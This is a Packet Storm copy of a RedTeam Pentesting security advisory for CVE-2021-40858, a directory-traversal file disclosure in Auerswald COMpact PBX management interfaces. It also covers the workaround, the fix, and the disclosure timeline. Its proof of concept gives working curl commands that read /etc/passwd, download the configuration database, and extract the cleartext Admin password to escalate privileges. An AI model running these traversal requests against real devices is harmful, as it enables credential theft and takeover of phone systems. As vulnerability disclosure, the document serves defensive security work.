exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Auerswald COMpact 8.0B Arbitrary File Disclosure

Auerswald COMpact 8.0B Arbitrary File Disclosure
Posted Dec 6, 2021
Site redteam-pentesting.de

RedTeam Pentesting discovered a vulnerability in the web-based management interface of the Auerswald COMpact 5500R PBX which allows users with the "sub-admin" privilege to access any files on the PBX's file system. Versions 8.0B and below are affected.

tags | exploit, web
advisories | CVE-2021-40858
SHA-256 | d996a18ccf6aeaf710400d44518247e46de43b267d135f9213bec807dc59597d

Auerswald COMpact 8.0B Arbitrary File Disclosure

Change Mirror Download
Advisory: Auerswald COMpact Arbitrary File Disclosure


RedTeam Pentesting discovered a vulnerability in the web-based
management interface of the Auerswald COMpact 5500R PBX which allows
users with the "sub-admin" privilege to access any files on the PBX's
file system.


Details
=======

Product: COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX), COMpact 5010 VoIP, COMpact 5020 VoIP, COMmander Business(19"), COMmander Basic.2(19")
Affected Versions: <= 8.0B (COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX))
Fixed Versions: 8.2B
Vulnerability Type: Arbitrary File Disclosure
Security Risk: medium
Vendor URL: https://www.auerswald.de/en/product/compact-5500r
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-006
Advisory Status: published
CVE: CVE-2021-40858
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40858


Introduction
============

"Fully modular VoIP appliance for more efficient communication processes
With the COMpact 5500R, you are originally equipped for everyday
business - now and in the future.

The fully modular architecture with 80 IP channels and all the functions
of a large ITC server allows up to 112 subscribers and thus scales with
your company.

Continuous maintanance and expansion of the system software makes this
versatile IP server a future-proof investment in any business
communication."

(from the vendor's homepage)


More Details
============

RedTeam Pentesting discovered that attackers with administrative access
to the PBX's web-based management interface (as a so-called "sub-admin")
can download arbitrary files from the PBX's file system. This includes
the usually not accessible configuration database which contains the
password for the highly privileged "Admin" user in clear text.


Proof of Concept
================

The command-line HTTP client curl[1] can be used to log into the
management interface of the PBX with the username "sub-admin" and the
password "verysecretpassword" as follows:

------------------------------------------------------------------------
$ curl --anyauth --user sub-admin:verysecretpassword --include \
https://192.168.1.2/tree

[...]
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
Set-Cookie: AUERSessionID1234123412=ERQMMDGECSGWTII; HttpOnly; Path=/
[...]

[{"login":2,"userId":2222,[...]}]
------------------------------------------------------------------------

The server returns a session ID in a cookie which is then used to check
the access level:

------------------------------------------------------------------------
$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \
https://192.168.1.2/logstatus_state

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
[...]

{"logstatus":"Sub-Administrator"}
------------------------------------------------------------------------

In the PBX's user management, the access level "Sub-Administrator" is
used for user accounts who should be able to configure the PBX. There
are also other, higher-level access privileges.

Users with the "sub-admin" privilege can configure music on hold (MOH,
"Wartemusik"), and for example listen to the currently configured music.
In order to do this, the browser requests the music files from the PBX.

The file "alarm1.wav" can be accessed with curl as follows:

------------------------------------------------------------------------
$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \
'https://192.168.1.2/wartemusik_verwaltung_play?fileName=alarm1.wav'\
'&pageindex=1'

HTTP/1.1 200 OK
Content-Type: audio/x-wav; charset=
Content-Length: 132192
Content-disposition: attachment; filename="alarm1.wav"
[...]
------------------------------------------------------------------------

It was found that the PBX allows directory traversal with the string
"../", so the file "/etc/passwd" can be accessed as follows:

------------------------------------------------------------------------
$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \
'https://192.168.1.2/wartemusik_verwaltung_play?'\
'fileName=../../etc/passwd&pageindex='

HTTP/1.1 200 OK
[...]
Content-Length: 113
Content-disposition: attachment; filename="../../etc/passwd"
[...]

root::0:0:root:/root:/bin/sh
netstorage::1:1::/data/ftpd:/bin/false
web::2:2::/opt/auerswald/lighttpd:/bin/false
------------------------------------------------------------------------

The same issue is present in the function for managing logos. A regular
request for the file "logo1.jpg" is shown below:

------------------------------------------------------------------------
$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \
'https://192.168.1.2/logo_verwaltung_preview?fileName=logo1.jpg&424'

HTTP/1.1 200 OK
X-XSS-Protection: 1
Content-Type: image/jpg; charset=UTF-8
Content-Length: 13986
Content-disposition: attachment; filename="logo1.jpg"
[...]
------------------------------------------------------------------------

In a similar fashion as before, the file "/etc/passwd" can be accessed:

------------------------------------------------------------------------
$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \
'https://192.168.1.2/logo_verwaltung_preview?fileName=../../etc/passwd'

HTTP/1.1 200 OK
[...]

root::0:0:root:/root:/bin/sh
netstorage::1:1::/data/ftpd:/bin/false
web::2:2::/opt/auerswald/lighttpd:/bin/false
------------------------------------------------------------------------

For attackers, an interesting file is the SQLite[2] database file
"/data/db/pbx4.db". It can be downloaded as follows:

------------------------------------------------------------------------
$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' 'https://'\
'192.168.1.2/logo_verwaltung_preview?fileName=../../data/db/pbx4.db' \
> pbx4.db

% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 5120 100 5120 0 0 16253 0 --:--:-- --:--:-- --:--:-- 16305
------------------------------------------------------------------------

This file contains the password for the highly privileged "Admin" user
account:

------------------------------------------------------------------------
$ sqlite3 pbx4.db
SQLite version 3.27.2 2019-02-25 16:06:06
Enter ".help" for usage hints.

sqlite> .tables
DbFileVersion PbxMisc

sqlite> select * from PbxMisc;
[...]
AdminPasswdHash|
AdminLogin|Admin
AdminPin|43214321
AdminPasswd|S3kr1t!
------------------------------------------------------------------------

The username and password can then be used to log into the web
application:

------------------------------------------------------------------------
$ curl --user 'Admin:S3kr1t!' --anyauth --include \
https://192.168.1.2/tree

HTTP/1.1 200 OK
Set-Cookie: AUERSessionID1234123412=AJXGKBFTCIHSHAC; HttpOnly; Path=/
[...]

[{"login":3,"userId":0,"userName":"",[...]}]
------------------------------------------------------------------------

Checking the access level reveals the new privilege:

------------------------------------------------------------------------
$ curl --cookie 'AUERSessionID1234123412=AJXGKBFTCIHSHAC' --include \
https://192.168.1.2/logstatus_state

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
[...]

{"logstatus":"Administrator"}
------------------------------------------------------------------------

The user "Admin", in contrast to regular administrative users
("sub-admin"), can access more functions and for example apply firmware
updates.

Workaround
==========

Disable or restrict access to the web-based management if possible.


Fix
===

Upgrade to a firmware version which corrects this vulnerability.


Security Risk
=============

Attackers who already have acquired administrative access as a so-called
"sub-admin" can download a database file and access the password for the
highly privileged "Admin" account. This account can use more functions and
is allowed to apply firmware updates.

On the one hand, exploiting this vulnerability already requires
administrative access. On the other hand, attackers can reach
high-privileged access to the PBX and use functions not available to
"sub-admin" users, like firmware updates. All in all, this vulnerability
is therefore rated to have a medium risk potential.


Timeline
========

2021-08-26 Vulnerability identified
2021-09-01 Customer approved disclosure to vendor
2021-09-10 Vendor notified
2021-09-10 CVE ID requested
2021-09-10 CVE ID assigned
2021-10-05 Vendor provides access to device with fixed firmware
2021-10-11 Vendor provides fixed firmware
2021-10-15 RedTeam Pentesting examines device, vulnerability seems to be corrected
2021-12-06 Advisory published


References
==========

[1] https://curl.se
[2] https://www.sqlite.org


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=============================

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/


--
RedTeam Pentesting GmbH Tel.: +49 241 510081-0
Dennewartstr. 25-27 Fax : +49 241 510081-99
52068 Aachen https://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close